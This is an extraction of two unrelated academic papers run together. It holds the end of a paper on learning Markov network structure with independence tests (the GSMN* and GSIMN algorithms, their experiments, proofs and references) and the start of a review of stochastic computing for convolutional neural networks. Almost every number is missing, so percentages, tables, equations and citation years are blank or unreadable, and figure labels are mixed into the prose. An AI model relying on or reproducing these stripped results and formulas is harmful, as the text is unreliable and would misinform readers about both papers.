three algorithms are similar. in some cases (e.g., water and hailfinder) the network resulting from the use of gsimn is actually better (of smaller hamming distance) than the ones output by the gsmn∗ algorithms. we also measured the weighted cost of the three algorithms for each of these domains, shown in fig. . the plots show a significant decrease in the weighted number of tests for gsimn with respect to both gsmn∗ algorithms: the cost of gsimn is % of the cost of gsmn∗ without propagation on average, a savings of %, while the cost of gsimn is % of the cost of gsmn∗ without propagation on average, a savings of %. . real-world data experiments while the artificial data set studies of the previous section have the advantage of allowing a more controlled and systematic study of the performance of the algorithms, experiments on real-world data are necessary for a more realistic assessment of their performance. real data are more challenging because they may come from non-random topologies (e.g., a possibly irregular lattice in many cases of spatial data) and the underlying probability distribution may not be faithful. we conducted experiments on a number of data sets obtained from the uci machine learning data set repository (newman, hettich, blake, & merz, ). continuous variables in the data sets were discretized using a method widely recommended in introductory statis- tics texts (scott, ); it dictates that the optimal number of equally-spaced discretization bins for each continuous variable is k = + log n , where n is the number of points in the efficient markov network structure discovery using independence tests w e ig h te d c o st o f te st s data set size (thousands of data points) weighted cost of tests for hailfinder data set gsmn* without propagation gsmn* with propagation gsimn w e ig h te d c o st o f te st s data set size (thousands of data points) weighted cost of tests for insurance data set gsmn* without propagation gsmn* with propagation gsimn w e ig h te d c o st o f te st s data set size (thousands of data points) weighted cost of tests for alarm data set gsmn* without propagation gsmn* with propagation gsimn w e ig h te d c o st o f te st s data set size (thousands of data points) weighted cost of tests for mildew data set gsmn* without propagation gsmn* with propagation gsimn w e ig h te d c o st o f te st s data set size (thousands of data points) weighted cost of tests for water data set gsmn* without propagation gsmn* with propagation gsimn figure : weighted cost of tests conducted by the gsmn∗ (with and without propagation) and gsimn algorithms for various real-world domains modeled by bayesian networks. - . - . . . . . . . . . . data set index weighted cost and accuracy for real-world data sets acc(gsimn) - acc(gsmn* without propagation) acc(gsimn) - acc(gsmn* with propagation) wc(gsimn) / wc(gsmn* without propagation) wc(gsimn) / wc(gsmn* with propagation) figure : ratio of the weighted number of tests of gsimn versus gsmn∗ and difference between the accuracy of gsimn and gsmn∗ on real data sets. ratios smaller that and positive bars indicate an advantage of gsimn over gsmn∗. the numbers in the x-axis are indices of the data sets as shown in table . data set. for each data set and each algorithm, we report the weighted number of condi- tional independence tests conducted to discover the network and the accuracy, as defined below. bromberg, margaritis, & honavar table : weighted number of tests and accuracy for several real-world data sets. for each evaluation measure, the best performance between gsmn∗ (with and without propagation) and gsimn is indicated in bold. the number of variables in the domain is denoted by n and the number of data points in each data set by n . data set weighted number of tests accuracy # name n n gsmn∗ gsmn∗ gsimn gsmn∗ gsmn∗ gsimn (w/o prop.) (w/ prop.) (w/o prop.) (w/ prop.) echocardiogram . . . ecoli . . . lenses . . . hayes-roth . . . hepatitis . . . cmc . . . balance-scale . . . baloons . . . flag . . . tic-tac-toe . . . bridges . . . car . . . monks- . . . haberman . . . nursery . . . crx . . . imports- . . . dermatology . . . adult . . . because for real-world data the structure of the underlying bayesian network (if any) is unknown, it is impossible to measure the hamming distance of the resulting network structure. instead, we measured the estimated accuracy of a network produced by gsmn∗ or gsimn by comparing the result (true or false) of a number of conditional independence tests on the network learned by them (using vertex separation) to the result of the same tests performed on the data set (using a χ test). this approach is similar to estimating accuracy in a classification task over unseen instances but with inputs here being triplets (x, y, z) and the class attribute being the value of the corresponding conditional independence test. we used / of the real-world data set (randomly sampled) as input to gsmn∗ and gsimn and the entire data set to the χ test. this corresponds to the hypothetical scenario that a much smaller data set is available to the researcher, and approximates the true value of the test by its outcome on the entire data set. since the number of possible tests is exponential, we estimated the independence accuracy by sampling , triplets (x, y, z) randomly, evenly distributed among all possible conditioning set sizes m ∈ { , . . . , n − } (i.e., /(n − ) tests for each m). each of these triplets was constructed as follows: first, two variables x and y were drawn randomly from v. second, the conditioning set was determined by picking the first m variables from a random permutation of v−{x, y }. denoting by t this set of , triplets, by t ∈t a triplet, by idata(t) the result of a test performed on the entire data set and by inetwork(t) the result of a test performed on the efficient markov network structure discovery using independence tests network output by either gsmn∗ or gsimn, the estimated accuracy is defined as: ̂accuracy = |t | ∣ ∣ ∣ ∣ { t ∈t | inetwork(t) = idata(t) } ∣ ∣ ∣ ∣ . for each of the data sets, table shows the detailed results for accuracy and the weighted number of tests for the gsmn∗ and gsimn algorithms. these results are also plotted in figure , with the horizontal axis indicating the data set index appearing in the first column of table . figure plots two quantities in the same graph for these real-world data sets: the ratio of the weighted number of tests of gsimn versus the two gsmn∗ algorithms and the difference of their accuracies. for each data set, an improvement of gsimn over gsmn∗ corresponds to a number smaller than for the ratios and a positive histogram bar for the accuracy differences. we can observe that gsimn reduced the weighted number of tests on every data set, with maximum savings of % over gsmn∗ without propagation (for the “crx” data set) and % over gsmn∗ with propagation (for the “crx” data set as well). moreover, in out of data sets gsimn resulted in improved accuracy, in a tie and only in somewhat reduced accuracy compared to gsmn∗ with propagation (for the “nursery” and “balance-scale” data sets). . conclusions and future research in this paper we presented two algorithms, gsmn∗ and gsimn, for learning efficiently the structure of a markov network of a domain from data using the independence-based approach (as opposed to np-hard algorithms based on maximum likelihood estimation) we evaluated their performance through measurement of the weighted number of tests they require to learn the structure of the network and the quality of the networks learned from both artificial and real-world data sets. gsimn showed a decrease in the vast majority of artificial and real-world domains in an output network quality comparable to that of gsmn∗, with some cases showing improvement. in addition, gsimn was shown to be nearly optimal in the number of tests executed compared to gsimn-fch, which uses an exhaustive search to produce all independence information that can inferred from pearl’s axioms. some directions of future research include an investigation into the way the topology of the underlying markov network affects the number of tests required and quality of the resulting network, especially for commonly occurring topologies such as grids. another research topic is the impact on number of tests of other examination and grow orderings of the variables. acknowledgments we thank adrian silvescu for insightful comments on accuracy measures and general advice on the theory of undirected graphical models. appendix a. correctness of gsmn∗ for each variable x ∈ v examined during the main loop of the gsmn∗ algorithm (lines – ), the set bx of variable x ∈ v is constructed by growing and shrinking a set s, bromberg, margaritis, & honavar starting from the empty set. x is then connected to each member of bx to produce the structure of a markov network. we prove that this procedure returns the actual markov network structure of the domain. for the proof of correctness we make the following assumptions. • the axioms of eqs. ( ) hold. • the probability distribution of the domain is strictly positive (required for intersection axiom to hold). • tests are conducted by querying an oracle, which returns its true value in the under- lying model. the algorithm examines every variable y ∈ λx for inclusion to s (and thus to bx ) during the grow phase (lines to ) and, if y was added to s during the grow phase, it considers it for removal during the shrinking phase (lines to ). note that there is only one test executed between x and y during the growing phase of x; we call this the grow test of y on x (line ). similarly, there is one or no tests executed between x and y during the shrinking phase; this test (if executed) is called the shrink test of y on x (line ). the general idea behind the proof is to show that, while learning the blanket of x, variable y is in s by the end of the shrinking phase if and only if the dependence (x ⊥⊥y | v −{x, y }) between x and y holds (which, according to theorem at the end of the appendix, implies there is an edge between x and y ). we can immediately prove one direction. lemma . if y /∈ s at the end of the shrink phase, then (x⊥⊥y | v −{x, y }). proof. let us assume that y /∈ s by the end of the shrink phase. then, either y was not added to set s during the grow phase (i.e., line was never reached), or removed from it during the shrink phase (i.e., line was reached). the former can only be true if (pxy > α) in line (indicating x and y are unconditionally independent) or y was found independent of x in line . the latter can only be true if y was found independent of x in line . in all cases then ∃a ⊆ v−{x, y } such that (x⊥⊥y | a), and by strong union then (x⊥⊥y | v −{x, y }). the opposite direction is proved in lemma below. however, its proof is more involved, requiring a few auxiliary lemmas, observations, and definitions. the two main auxiliary lemmas are and . both use the lemma presented next (lemma ) inductively to extend the conditioning set of dependencies found by the grow and shrink tests between x and y , to all the remaining variables v−{x, y }. the lemma shows that, if a certain independence holds, the conditioning set of a dependence can be increased by one variable. lemma . let x, y ∈ v, z ⊆ v −{x, y }, and z′ ⊆ z. then ∀w ∈ v, (x ⊥⊥y | z) and (x⊥⊥w | z′ ∪{y }) =⇒ (x ⊥⊥y | z ∪{w}). efficient markov network structure discovery using independence tests proof. we prove by contradiction, and make use of the axioms of intersection (i), strong union (su), and decomposition (d). let us assume that (x ⊥⊥y | z) and (x⊥⊥w | z′∪{y }) but (x⊥⊥y | z ∪{w}). then (x⊥⊥y | z ∪{w}) and (x⊥⊥w | z′ ∪{y }) su =⇒ (x⊥⊥y | z ∪{w}) and (x⊥⊥w | z ∪{y }) i =⇒ (x⊥⊥{y, w} | z) d =⇒ (x⊥⊥y | z) ∧ (x⊥⊥w | z) =⇒ (x⊥⊥y | z). this contradicts the assumption (x ⊥⊥y | z). we now introduce notation and definitions and prove auxiliary lemmas. we denote by sg the value of s at the end of the grow phase (line ) i.e., the set of variables found dependent of x during the grow phase, and by ss the value of s at the end of the shrink phase (line ). we also denote by g the set of variables found independent of x during the grow phase and by u = [u , . . . , uk] the sequence of variables shrunk from bx , i.e., found independent of x during the shrink phase. the sequence u is assumed ordered as follows: if i < j then variable ui was found independent from x before uj during the shrinking phase. a prefix of the first i variables [u , . . . , ui− ] of u is denoted by ui. for some test t performed during the algorithm, we define k(t) as the integer such that uk(t) is the prefix of u containing the variables that were found independent of x in this loop before t. furthermore, we abbreviate uk(t) by ut. from the definition of u and the fact that in the grow phase the conditioning set increases by dependent variables only, we can immediately make the following observation: observation . for some variable ui ∈ u, if t denotes the shrink test performed between x and ui then ut = ui− . we can then relate the conditioning set of the shrink test t with ut as follows: lemma . if y ∈ ss and t = (x, y | z) is the shrink test of y , then z = sg −ut −{y }. proof. according to line of the algorithm, z = s−{y }. at the beginning of the shrink phase (line ) s = sg, but variables found independent afterward and until t is conducted are removed from s in line . thus, by the time t is performed, s = sg − ut and the conditioning set becomes sg − ut −{y }. corollary . (x⊥⊥ui | sg − ui). proof. the proof follows immediately from lemma , observation , and the fact that ui = ui− ∪{ui}. the following two lemmas use lemma inductively to extend the conditioning set of the dependence between x and a variable y in ss . the first lemma starts from the shrink test between x and y (a dependence), and extends its conditioning set from ss −{y } (or equivalently sg −{y }− ut according to lemma ) to sg −{y }. bromberg, margaritis, & honavar lemma . if y ∈ ss and t is the shrink test of y , then (x ⊥⊥y | sg −{y }). proof. the proof proceeds by proving (x ⊥⊥y | sg −{y }− ui) by induction on decreasing values of i, for i ∈ { , , . . . , k(t)}, starting at i = k(t). the lemma then follows for i = by noticing that u = ∅. • base case (i = k(t)): from lemma , t = (x, y | sg −{y }− ut), which equals (x, y | sg −{y }−uk(t)) by definition of ut. since y ∈ ss , it must be the case that t was found dependent, i.e., (x ⊥⊥y | sg −{y }− uk(t)). • inductive step: let us assume that the statement is true for i = m, < m ≤ k(t)− : (x ⊥⊥y | sg −{y }− um). ( ) we need to prove that this is also true for i = m − : (x ⊥⊥y | sg −{y }− um− ). by corollary , we have (x⊥⊥um | sg − um) and by strong union, (x⊥⊥um | (sg − um) ∪{y }) or (x⊥⊥um | (sg − um −{y }) ∪{y }). ( ) from eqs. ( ), ( ) and lemma we get the desired relation: (x ⊥⊥y | (sg −{y }− um) ∪{um}) = (x ⊥⊥y | sg −{y }− um− ). observation . by definition of sg, we have that for every test t = (x, y | z) performed during the grow phase, z ⊆ sg. the following lemma completes the extension of the conditioning set of the dependence between x and y ∈ ss into the universe of variables v −{x, y }, starting from sg −{y } (where lemma left off) and extending it to sg ∪ g −{y }. lemma . if y ∈ ss, then (x ⊥⊥y | sg ∪ g −{y }). proof. the proof proceeds by proving (x ⊥⊥y | sg ∪ gi −{y }) by induction on increasing values of i from to |g|, where gi denotes the first i elements of an arbitrary ordering of set g. efficient markov network structure discovery using independence tests • base case (i = ): follows directly from lemma for i = , since g = ∅. • inductive step: let us assume that the statement is true for i = m, ≤ m < |g|: (x ⊥⊥y | sg ∪ gm −{y }). ( ) we need to prove that it is also true for i = m + : (x ⊥⊥y | sg ∪ gm+ −{y }). ( ) from observation the grow test of gm results in the independence: (x⊥⊥gm | z), where z ⊆ sg. by the strong union axiom this can become: (x⊥⊥gm | z ∪{y }), where z ⊆ sg ( ) or equivalently (x⊥⊥gm | (z −{y }) ∪{y }), where z ⊆ sg. ( ) since z ⊆ sg ⊆ sg ∪ gm, we have that z −{y } ⊆ sg ∪ gm, and so from eq. ( ) and lemma we get the desired relation: (x ⊥⊥y | (sg ∪ gm −{y }) ∪ gm) = (x ⊥⊥y | sg ∪ gm+ −{y }). finally, we can prove that x is dependent with every variable y ∈ ss given the universe v −{x, y }. lemma . if y ∈ ss, then (x ⊥⊥y | v −{x, y }). proof. from lemma , (x ⊥⊥y | sg ∪ g −{y }) it suffices then to prove that sg ∪ g −{y } = v −{x, y }. in loop – of gsmn ∗, the queue λx is populated with all elements in v −{x}, and then, in line , y is removed from λx . the grow phase then partitions λx into variables dependent of x (set sg) and independent of x (set g). corollary . y ∈ ss ⇐⇒ (x ⊥⊥y | v −{x, y }). proof. follows directly from lemmas and . from the above corollary we can now immediately show that the graph returned by connecting x to each member of bx = ss is exactly the markov network of the domain using the following theorem, first published by pearl and paz ( ). theorem . (pearl & paz, ) every dependence model m satisfying symmetry, decom- position, and intersection (eqs. ( )) has a unique markov network g = (v, e) produced by deleting from the complete graph every edge (x, y ) for which (x⊥⊥y | v −{x, y }) holds in m , i.e., (x, y ) /∈ e ⇐⇒ (x⊥⊥y | v −{x, y }) in m . bromberg, margaritis, & honavar appendix b. correctness of gsimn the gsimn algorithm differs from gsmn∗ only by the use of test subroutine igsimn instead of igsmn∗ (algorithms and , respectively), which in turn differs by a number of additional inferences conducted to obtain the independencies (lines to ). these inferences are direct applications of the strong union axiom (which holds by assumption) and the triangle theorem (which was proven to hold in theorem ). using the correctness of gsmn∗ (proven in appendix a) we can therefore conclude that the gsimn algorithm is correct. references abbeel, p., koller, d., & ng, a. y. ( ). learning factor graphs in polynomial time and sample complexity. journal of machine learning research, , – . acid, s., & de campos, l. m. ( ). searching for bayesian network structures in the space of restricted acyclic partially directed graphs. journal of artificial intelligence research, , – . agresti, a. ( ). categorical data analysis ( nd edition). wiley. aliferis, c. f., tsamardinos, i., & statnikov, a. ( ). hiton, a novel markov blanket algorithm for optimal variable selection. in proceedings of the american medical informatics association (amia) fall symposium. anguelov, d., taskar, b., chatalbashev, v., koller, d., gupta, d., heitz, g., & ng, a. ( ). discriminative learning of markov random fields for segmentation of d range data. in proceedings of the conference on computer vision and pattern recognition (cvpr). barahona, f. ( ). on the computational complexity of ising spin glass models. journal of physics a: mathematical and general, ( ), – . besag, j. ( ). spacial interaction and the statistical analysis of lattice systems. journal of the royal statistical society, series b, , – . besag, j., york, j., & mollie, a. ( ). bayesian image restoration with two applications in spatial statistics.. annals of the institute of statistical mathematics, , – . bromberg, f., margaritis, d., & honavar, v. ( ). efficient markov network structure dis- covery from independence tests. in proceedings of the siam international conference on data mining. buntine, w. l. ( ). operations for learning with graphical models. journal of artificial intelligence research, , – . castelo, r., & roverato, a. ( ). a robust procedure for gaussian graphical model search from microarray data with p larger than n. journal of machine learning research, , – . chow, c., & liu, c. ( ). approximating discrete probability distributions with depen- dence trees. ieee transactions on information theory, ( ), – . efficient markov network structure discovery using independence tests cochran, w. g. ( ). some methods of strengthening the common χ tests. biometrics, , – . della pietra, s., della pietra, v., & lafferty, j. ( ). inducing features of random fields. ieee transactions on pattern analysis and machine intelligence, ( ), – . dobra, a., hans, c., jones, b., nevins, j. r., yao, g., & west, m. ( ). sparse graphical models for exploring gene expression data. journal of multivariate analysis, , – . edwards, d. ( ). introduction to graphical modelling ( nd edition). springer, new york. friedman, n., linial, m., nachman, i., & pe’er, d. ( ). using bayesian networks to analyze expression data. computational biology, , – . geman, s., & geman, d. ( ). stochastic relaxation, gibbs distributions, and the bayesian relation of images.. ieee transactions on pattern analysis and machine intelligence, , – . heckerman, d. ( ). a tutorial on learning bayesian networks. tech. rep. msr-tr- - , microsoft research. heckerman, d., geiger, d., & chickering, d. m. ( ). learning bayesian networks: the combination of knowledge and statistical data. machine learning, , – . henrion, m. ( ). propagation of uncertainty by probabilistic logic sampling in bayes’ networks. in lemmer, j. f., & kanal, l. n. (eds.), uncertainty in artificial intelli- gence . elsevier science publishers b.v. (north holland). hofmann, r., & tresp, v. ( ). nonlinear markov networks for continuous variables. in neural information processing systems, vol. , pp. – . isard, m. ( ). pampas: real-valued graphical models for computer vision. in ieee conference on computer vision and pattern recognition, vol. , pp. – . jerrum, m., & sinclair, a. ( ). polynomial-time approximation algorithms for the ising model. siam journal on computing, , – . kearns, m. j., & vazirani, u. v. ( ). an introduction to computational learning theory. mit press, cambridge, ma. koller, d., & sahami, m. ( ). toward optimal feature selection. in international con- ference on machine learning, pp. – . lam, w., & bacchus, f. ( ). learning bayesian belief networks: an approach based on the mdl principle. computational intelligence, , – . lauritzen, s. l. ( ). graphical models. oxford university press. margaritis, d., & thrun, s. ( ). bayesian network induction via local neighborhoods. in solla, s., leen, t., & müller, k.-r. (eds.), advances in neural information processing systems , pp. – . mit press. mccallum, a. ( ). efficiently inducing features of conditional random fields. in pro- ceedings of uncertainty in artificial intelligence (uai). bromberg, margaritis, & honavar newman, d. j., hettich, s., blake, c. l., & merz, c. j. ( ). uci repository of machine learning databases. tech. rep., university of california, irvine, dept. of information and computer sciences. peña, j. m. ( ). learning gaussian graphical models of gene networks with false dis- covery rate control. in proceedings of the th european conference on evolutionary computation, machine learning and data mining in bioinformatics, pp. – . pearl, j. ( ). probabilistic reasoning in intelligent systems: networks of plausible in- ference. morgan kaufmann publishers, inc. pearl, j., & paz, a. ( ). graphoids: a graph-based logic for reasoning about releveance relations. tech. rep. (r- -l), cognitive systems laboratory, university of california. rebane, g., & pearl, j. ( ). the recovery of causal poly-trees from statistical data. in kanal, l. n., levitt, t. s., & lemmer, j. f. (eds.), uncertainty in artificial intelligence , pp. – , amsterdam. north-holland. schäfer, j., & strimmer, k. ( ). an empirical bayes approach to inferring large-scale gene association networks. bioinformatics, , – . scott, d. w. ( ). multivariate density estimation. wiley series in probability and mathematical statistics. john wiley & sons. shekhar, s., zhang, p., huang, y., & vatsavai, r. r. ( ) in kargupta, h., joshi, a., sivakumar, k., & yesha, y. (eds.), trends in spatial data mining, chap. , pp. – . aaai press / the mit press. spirtes, p., glymour, c., & scheines, r. ( ). causation, prediction, and search ( nd edition). adaptive computation and machine learning series. mit press. srebro, n., & karger, d. ( ). learning markov networks: maximum bounded tree-width graphs. in acm-siam symposium on discrete algorithms. tsamardinos, i., aliferis, c. f., & statnikov, a. ( a). algorithms for large scale markov blanket discovery. in proceedings of the th international flairs conference, pp. – . tsamardinos, i., aliferis, c. f., & statnikov, a. ( b). time and sample efficient discov- ery of markov blankets and direct causal relations. in proceedings of the th acm sigkdd international conference on knowledge discovery and data mining, pp. – . tsamardinos, i., brown, l. e., & aliferis, c. f. ( ). the max-min hill-climbing bayesian network structure learning algorithm. machine learning, , – . whittaker, j. ( ). graphical models in applied multivariate statistics. john wiley & sons, new york. submitted august accepted october published november corresponding author zaini abdul halim, zaini@usm.my academic editor shuihua wang additional information and declarations can be found on page doi . /peerj-cs. copyright lee and abdul halim distributed under creative commons cc-by . open access stochastic computing in convolutional neural network implementation: a review yang yang lee and zaini abdul halim school of electrical and electronic engineering, universiti sains malaysia, nibong tebal, penang, malaysia abstract stochastic computing (sc) is an alternative computing domain for ubiquitous deter- ministic computing whereby a single logic gate can perform the arithmetic operation by exploiting the nature of probability math. sc was proposed in the s when binary computing was expensive. however, presently, sc started to regain interest after the widespread of deep learning application, specifically the convolutional neural network (cnn) algorithm due to its practicality in hardware implementation. although not all computing functions can translate to the sc domain, several useful function blocks related to the cnn algorithm had been proposed and tested by researchers. an evolution of cnn, namely, binarised neural network, had also gained attention in the edge computing due to its compactness and computing efficiency. this study reviews various sc cnn hardware implementation methodologies. firstly, we review the fundamental concepts of sc and the circuit structure and then compare the advantages and disadvantages amongst different sc methods. finally, we conclude the overview of sc in cnn and make suggestions for widespread implementation. subjects artificial intelligence, computer architecture, data mining and machine learning, embedded computing, real-time and embedded systems keywords stochastic computing, convolutional neural network, deep learning, fpga, iot introduction deep learning algorithms have been widely and silently integrated into our daily life; for example, image enhancer, voice search and linguistic translation. meanwhile, the internet of things (iot) has gained industrial recognition, and many applications rely on edge computing whereby data are processed on the fly rather than relayed to cloud computing for reliability and security reasons (naveen & kounte, ). people have been heavily dependent on a widely accessible central processing unit (cpu) and general- purpose graphics processing unit (gpu) for deep learning research and application deployment. although users strive to achieve great real-time response by offloading many computationally intensive tasks, such as object recognition to edge devices, those computing devices become extremely inefficient despite the utmost priority of power efficiency in iot. although the field-programmable gate array (fpga) and application-specific integrated circuit (asic) could overcome the power efficiency issue, economically implementing deep learning hardware logic is not ideal. thus, researchers are trying to explore alternatives to conventional binary in this specific use case, driving the rise of stochastic computing (sc). how to cite this article lee yy, abdul halim z. . stochastic computing in convolutional neural network implementation: a review. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:zaini@usm.my https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. sc was proposed in the s when the cost of implementing binary computing was prohibitive but soon ran out of favour in the semiconductor industry. unlike binary computing, sc can perform the arithmetic operation with a single logic gate. the most evident advantage of sc is its ability to reduce the area and power draw by reducing the number of active transistors (de aguiar & khatri, ). sc is also an inherently progressive precision where the output converges from the most significant figure; thus, sc is capable of making early decision termination (edt). power efficiency and edt capability make deep learning application favourable (kim et al., ), particularly in convolutional neural network (cnn) application. cnn received extensive development since its introduction in due to its unprecedented performance in object recognition. cnn model development was trending from being deep and massive (highly accurate) to responsive (fast inference). in response to the iot requirements in edge computing, researchers had attempted to reduce the math precision to save computing resources. with a reasonable trade-off for accuracy, an extreme simplification version of cnn, that is, binarised neural network (bnn), emerged with a promising hardware implementation capability and computing efficiency, rivalling sc methodology. sc in cnn lacks widespread attention due to its cross-disciplinary nature in the computer science study. cnn is impactful in the field of machine learning, but the rising of iot edge computing which pursues efficient computing pushed back cnn implementation hard. while many researchers focus on innovating cnn algorithms for different use cases such as medicine and agriculture, only a few of them consider how to implement cnn realistically since cnn execution is computationally intensive by itself. given that no comprehensive and updated review exists on this specific area, in this review paper we thus attempt to investigate and survey the sc implementation in the cnn application. review methodology this review intends to answer the following research questions: ( ) what are the major developments of sc elements and sc cnn in recent years? due to the narrow field of study in sc, the related studies are scattered, let alone the sc in cnn implementation; thus, impede the development of sc cnn without a more centralised reference, increasing difficulty in identifying the research trends. ( ) how exactly is the cnn being computed/executed in the stochastic domain? sc is a unique computing methodology which is not often being mentioned in the academic study, despite its unique advantage in the surge of cnn application. thus, there is a need to have a big picture on the sc cnn mechanism. ( ) what are the open problems and/or opportunities to implement sc cnn? sc cnn does have its implementation hurdles. thus, it is necessary to summarise them before moving forward in this field of research. with the research questions in mind, we first reviewed the basic concepts of sc and cnn in modern perspectives. it is necessary to understand the background of sc and cnn due to the vastly different field of studies between them. moreover, there is a need to lee and abdul halim ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. aggregate the knowledge of sc elements in the face of rising trends in sc developments. then we examined the recent developments and contributions of sc in cnn computation and compared the implementation methodologies across various recent studies. finally, we made a conclusion and some suggestions for the future of deep learning research in the sc domain. search criteria an initial search was carried out to identify an initial set of papers which have the prior works on sc and cnn in hardware implementation. the search strings were then inferred and developed as follows: (‘stochastic computing’) or (‘stochastic computing deep learning’) or (‘stochastic computing convolutional neural network’) or (‘stochastic computing neural network’) or (‘stochastic computing image processing’) ‘stochastic’ alone has a lot of meaning in a wide area of study. thus, the keyword of ‘stochastic computing’ is a necessity to narrow down the search scope. the search strings were applied to the indexed scientific database scopus and web of science (peer-reviewed). domain-oriented databases (acm digital library, ieee xplore digital library) were also referred extensively. finally, google scholar (limited to peer-reviewed papers) were used to find any omitted academic literature, especially in this multi-disciplinary search scope. peer-reviewed articles were preferred to ensure only confirmed works were to be summarised in this review paper. scope of review notably, sc is not the only methods existed for efficient cnn computing. we only cover the topics of sc and sc related to cnn computing in this review study. many articles may not directly involve cnns, but their novel sc elements are worthy as part of the significant sc developments and potentially useful for the future sc cnn function blocks, thus, will be mentioned in this review. some elemental studies on cnns were referred to understand the nature of cnn algorithms better. some surveys on cnn implementation in fpga merely or never discuss the sc, but they shared a similar concern on efficient cnn computation. thus, their surveys were also considered and referred to in this review study if any. basic concepts sc and cnn are different fields of studies and worth a separate explanation. thus, sc will be described first, then secondly cnn and bnn will be explained. lastly, the competitive relationship between sc and bnn implementations will be discussed. sc is a unique concept of computing relative to traditional binary computing and has to be understood before an in-depth discussion on sc implementation in cnn at the next section. sc sc is favourable in iot application due to its extreme simplicity of computing elements, where power efficiency is of utmost priority. unlike deterministic computing that tolerates lee and abdul halim ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. x>y y x comparator stochastic  logic circuits outstream counter random  number  generator binary number binary  number binary domain stochastic domain binary domain stochastic bitstream figure process of sc and its elements. full-size doi: . /peerjcs. /fig-  ( / )  ( / ) s s  ( / ) s s s d c enb multiplexer  ( / )  ( / )  ( / )  ( / )s s s s  ( / )  ( / ) s s  ( / ) s  ( / )  ( / ) s s  ( / ) s a b c d figure sc arithmetic operation. (a)and gate as sc unipolar multiplier. (b) mux as sc scaled adder. (c) uncorrelated bit streams give accurate output. (d) correlated bit streams give inaccurate output. full-size doi: . /peerjcs. /fig- absolutely no error, sc allows errors to a certain degree, thus the name approximate computing. sc initially decodes a binary number into a bitstream in such a way that the frequency of ’s bit represents the magnitude of value. for example, [ , , , , , , , ] stochastic stream is equal to / or . because it has three ’s bits. then, the number can be computed in the stochastic domain with a simple logic gate instead of gate combinations in the binary domain. finally, the stochastic stream will be converted back to binary numbers with a simple counter by counting the frequency of ’s bit, as shown in fig. . sc took advantage of probability math to reduce the logic components required to perform an arithmetic operation. taking figs. a and b as examples, in the and gate multiplication operation, the output can be defined as: s =p(s )=p(s )p(s )=s ×s . ( ) in the case of addition operation, the output will be scaled by half with mux select input with a bitstream value of . . the mux scaled adder can be defined as: s =p(s )p(s )+( −p(s ))p(s )= p(s )+p(s ) = s +s ,p(s )= . , ( ) lee and abdul halim ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. where p is the probability of the stochastic stream. the and gate multiplier only applies to unipolar math where the real number ∈ [ , ]. in the case of bipolar math where real number ∈ [− , ] ( ’s bit decodes as − ), the xnor gate can be used as a multiplier, whereas the same mux can function as a bipolar adder. the stochastic number generator (sng) becomes the heart of the sc to perform arithmetic operations in the stochastic domain. sng consists of a random number generator (rng) and a comparator; both worked synchronously to generate stochastic bitstream from a given binary number. however, the rng was the biggest challenge in the previous sc circuit design because the correlation between the operating bitstreams plays a great role in sc accuracy. an sc output will be accurate only if both working streams are not correlated. taking figs. c and d as examples, [ , , , , , , , ] and [ , , , , , , , ] bitstreams can represent the value of / , but the output on fig. d is far from accurate due to a high correlation to the opposite bitstream. the correlation index of both bitstreams can be defined as: n∑ i= s (i)s (i)= ∑n i= s (i)× ∑n i= s (i) n , ( ) where ‘s’ is the respective stochastic bitstream and ‘n’ is the bit length. thus, the accuracy is highly dependent on the randomness and the lengths of the stochastic stream. nevertheless, not all of the sc elements are sensitive to stochastic correlation such as mux scaled adder (alaghi, qian & hayes, ). presently, a pseudo-random rng called a linear-feedback shift register (lfsr) is widely accepted due to its simple design and effectiveness in lowering bitstream correlation (alaghi & hayes, ). lfsr consists of a feedback xor gate and a bit shift register as shown in fig. a. the register will be initialised with a specific value, and then, the register will generate pseudo-random binary values in every bit shifting clock cycle. the binary number generated from rng will be compared with the user input binary number. two circuits can be used as a comparator, namely, binary comparator and weighted binary generator (wbg) as shown in figs. b and c respectively. both are capable of generating stochastic bitstream. after the stochastic stream passed through the stochastic logic circuits, the computed stochastic streams can be converted back to the binary domain by using a simple flip-flop counter. sc never stops improving and keep achieving great accuracy whilst using less area and power. sng is the major overhead of the sc circuit. as such, ichihara et al. ( ) proposed a circular shifting technique to share lfsr. then, (kim, lee & choi, a) proposed a method very similar to memoisation computing to reduce the number of lfsrs in large scale sc. xie et al. ( ) attempted to share lfsr with wire exchange technique with additional random bit flip, whereas joe & kim ( ) proposed symmetrical exchange of odd wire and even wire. even better, salehi ( ) showed that simple wire permutation paired with wbg could deliver the lowest correlation index, thus achieving great accuracy whilst requiring fewer logic gates. interestingly, chen, ting & hayes ( ) replaced lfsr with up-counter in conjunction with wbg to take advantage of wbg binary weighting characteristics to assure sc progressive precision behaviour. as such, zero-error edt is lee and abdul halim ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. l l l l l x l x l x l x stochastic bitstream l l l l x  x  x  x stochastic bitstream a c b figure sng components. (a) rng with lfsr. (b) true comparator. (c) wbg. full-size doi: . /peerjcs. /fig- achievable without extra hardware cost. the wbg could also be shared partially because some wbg logics could be redundant (yang et al., ). more advanced operations, such as square, division and non-linear functions, had also gained attention and innovations to fit modern applications. the stochastic square is already in its simplest form as shown in fig. a. squaring stochastic stream can be conducted by delaying the input stream with d flip-flop before multiplying itself. in the case of a non-linear function, such as hyperbolic tangent (tanh), stochastic tanh (stanh) uses k-state finite state machine (fsm), such as that in fig. b. fsm is a class of logic circuits that will have a specific logical output pattern only if the input reached a designated sequential threshold. stanh function can be described as: stanh(k,x)= tanh ( kx ) , ( ) where k is the number of states (must be multiples of ) and x is the input stream. brown & card ( ) showed that stanh function responds closely to the true tanh function with k = . however, too many states will result in random walk behaviour (kim et al., ); thus, an optimum amount of state for accurate reproduction of tanh function lee and abdul halim ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. q q set clr d x y=x clk s s sn/ ‐ sn sn‐ sn/ x’ x x’ x  x  x’ 